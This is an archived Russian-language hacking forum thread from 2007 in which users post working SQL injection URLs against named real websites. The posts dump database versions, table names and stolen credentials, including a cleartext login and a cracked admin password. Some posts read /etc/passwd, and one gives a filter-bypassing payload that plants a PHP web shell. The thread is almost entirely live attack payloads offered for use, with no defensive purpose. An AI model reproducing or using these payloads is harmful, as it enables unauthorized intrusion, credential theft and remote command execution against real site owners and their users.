ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.11.2007, 16:01
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
eurogarden.ro
Код:
http://www.eurogarden.ro/categorie.php?itemid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7/*
5.0.24a-standard-log:eurogarden:eurogarden@goober.dreamhost.com
18 таблиц:
Код:
http://www.eurogarden.ro/categorie.php?itemid=-1+union+select+1,2,3,4,5,table_name,7+from+information_schema.tables+limit+17,1/*
интересных - нет.
books.bg
Код:
http://www.books.bg/ItemBought.php?shop=-1+union+select+1,concat_ws(0x3a,version(),database(),user())/*
5.0.38-Ubuntu_0ubuntu1.1:books2:books2@localhost
139 таблиц:
Код:
http://www.books.bg/ItemBought.php?shop=-1+union+select+1,table_name+from+information_schema.tables+limit+138,1/*
Интересные таблицы:
Код:
phpbb_users
users
users_login
root:
Код:
http://www.books.bg/ItemBought.php?shop=-1+union+select+1,concat_ws(0x3a,col_user_name,col_password)+from+users_login+limit+0,1/*
"логин:пасс" : idenev:UIB7jqkj
|
|
|
15.11.2007, 17:36
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Сообщение от je0n
а можно как-нить файл залить, если кавычка фильтруется?
вот по сути запрос заливки шелла в вашем случае...
Код:
http://theplace.ru/news/news.php?id=-18864+union+select+1,2,3,4,5,6,7,'<?php system($_GET[cmd]); ?>',9,10,11,12+from+into+outfile+'/здесь путь.../cmd.php'/*
так будет выглядить запрос для обхода фильтрации
Код:
http://theplace.ru/news/news.php?id=-18864+union+select+1,2,3,4,5,6,7,CHAR(39, 60, 63, 112, 104, 112, 32, 115, 121, 115, 116, 101, 109, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 32, 63, 62, 39),9,10,11,12+from+into+outfile+CHAR(39, 47, 1079, 1076, 1077, 1089, 1100, 32, 1087, 1091, 1090, 1100, 46, 46, 46, 47, 99, 109, 100, 46, 112, 104, 112, 39)/*
P.S существует удобный плагин для таких дел HackBar (Firefox)...
|
|
|
|
15.11.2007, 18:11
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 8
Провел на форуме:
37581
Репутация:
15
|
|
http://www.it-rex.ru/ftpgetfile.php?id=69'
Как раскрутить - не знаю...
http://www.it-rex.ru/ftpgetfile.php?id=69' union select null,pass from user where name ='admin
так ошибка не вылетает, но и данных нет
|
|
|
|
15.11.2007, 18:31
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
_www.dancor.sumy.ua
Код:
_http://www.dancor.sumy.ua/ads.php?archive=0&rubric_id=-123/**/union/**/select/**/1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6/*
_www.shopcdn.ca (ShopCANADIAN)
Смотрим версию мускула, пользователя, базу:
Код:
_http://www.shopcdn.ca/searchresult.php?sbcat_id=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4/*
5.0.22-community-max-nt:shopcdn@209.132.230.90:shopcdn
Повезло: версия=>5
Смотрим таблицы, меняя лимит:
Код:
http://www.shopcdn.ca/searchresult.php?sbcat_id=-1+union+select+1,table_name,3,4+from+information_schema.tables+limit+1,1/*
40 таблиц |
|
|
|
15.11.2007, 18:44
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Сообщение от Holokost
http://www.it-rex.ru/ftpgetfile.php?id=69'
Как раскрутить - не знаю...
http://www.it-rex.ru/ftpgetfile.php?id=69' union select null,pass from user where name ='admin
так ошибка не вылетает, но и данных нет
Код:
_http://www.it-rex.ru/ftpgetfile.php?id=69'+union+select+1,2/*
При таком запросе предлагается файл boot98se.exe на скачку 
|
|
|
|
15.11.2007, 19:58
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://www.admedicine.org/news.php?id=-278+union+select+1,2,concat_ws(0x2F,user(),version(),database()),4,5/*
u_admedicine@localhost/4.1.22/admedicine |
|
|
|
15.11.2007, 20:26
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
http://www.sibdosug.com/
Код:
http://www.sibdosug.com/type.php?type=-4+union+select+concat(username,char(58),password)+from+phorum_users+where+admin=1/*
Версия: 4.1.22
Юзверь: sibdosug_db2@88.214.192.33
Код:
http://www.sibirdosug.com/phorum/admin.php
-
admin:9da3bd1c75d51cc5da6a4fa573e269cd: slec700
Сенькс фор брутед хэш ту Iceangel_ =)
http://www.shark.ru/
Код:
http://www.shark.ru/catalog.php?rid=-37+union+select+1,load_file('/etc/passwd'),3,4,5,6,7/*
Version: 4.0.22-standard
User: root@localhost
Также можно прочитать: /etc/hosts, /etc/services, /etc/group, /etc/profile, /etc/bashrc, /etc/skel/.bashrc, /etc/php.ini, /etc/httpd/conf/httpd.conf
http://www.b-connect.ru/
Код:
http://www.b-connect.ru/view.php?id=-1155'+union+select+1,2,concat(version(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Version: 4.0.26-log
User: Uwww3901S@localhost
http://www.rapida.ru/
Код:
http://www.rapida.ru/news.php?id=-22'+union+select+1,2,aes_decrypt(aes_encrypt(concat(version(),0x3a,user()),0x71),0x71),4+from+news/*
Version: 4.1.14
User: rap_app@server2.int.rapida.ru
http://www.strasty.ru/
Код:
http://www.strasty.ru/disk.php?id=-996+union+select+1,2,3,concat(version(),char(58),user()),5/*
Version: 4.1.20-log
User: a2856_strasty@localhost
Последний раз редактировалось 0nep@t0p; 15.11.2007 в 20:30..
|
|
|
|
15.11.2007, 21:00
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
Код:
http://www.huntingdon-free-church.org.uk/index.php?pageid=-112+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
4.1.10a-standard-log
admin@localhost
eGeniusSystem
Названия таблиц подобрать не смог...( |
|
|
|
15.11.2007, 21:28
|
|
Познающий
Регистрация: 26.07.2007
Сообщений: 50
Провел на форуме:
177050
Репутация:
62
|
|
Сообщение от 5taY3r
Код:
http://www.huntingdon-free-church.org.uk/index.php?pageid=-112+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
Названия таблиц подобрать не смог...( Это то что нашел...
Код:
http://www.huntingdon-free-church.org.uk/index.php?pageid=-112+union+select+1,2,concat_ws(0x05,id,pagename,pagetitle),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+pages/*
|
|
|
|
15.11.2007, 21:42
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.kimkimdir.gen.tr/kimkimdir.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
5.0.26-log admin-215@web-lnx-4.ttidc.com.tr
Код:
http://skoool.meb.gov.tr/keystage3.aspx?id=1+or+1=@@version
'Microsoft SQL Server 2000
Код:
http://skoool.meb.gov.tr/keystage3.aspx?id=1+or+1=(select+top+1+table_name+from+INFORMATION_SCHEMA.TABLES+where+table_name+not+in+('content_history','ad_mapping_tbl','app_messages','approval_status_tbl','approval_tbl','calendar_event_tbl','calendar_tbl','cms_content_types','config_tbl','content','content__','content_edit','content_folder_tbl','content_index','content_index_new','content_meta_tbl','content3','dtproperties','edit_meta_tbl','folder_to_template_tbl','fonts','form_tbl','history_meta_tbl','history_xml_tbl','language_type','library','library_folder_tbl','libtype','load_balance_tbl','max_entries','metadata_type','module_licenses','nav_tbl','nav_to_content_tbl','permissions_tbl','save_meta_tbl','save_tbl','settings','sysconstraints','syssegments','tbl_bettData','templates_tbl','user_to_group_tbl','usergroups','users','xml_collection_tbl','xml_to_item_tbl'))
Код:
http://www.dusunenadam.com.tr/koseyazilari.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6/*
4.1.1-alpha-max
Код:
http://www.harlemstage.org/SEASON/index.php?id=-1+union+select+1,2,3,4,version(),6/*
4.1.20-log
Код:
http://www.stagenoise.com/stagecast/episode.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9/*
4.0.27-max-log |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?505749){kind=avatar}
Линейный вид
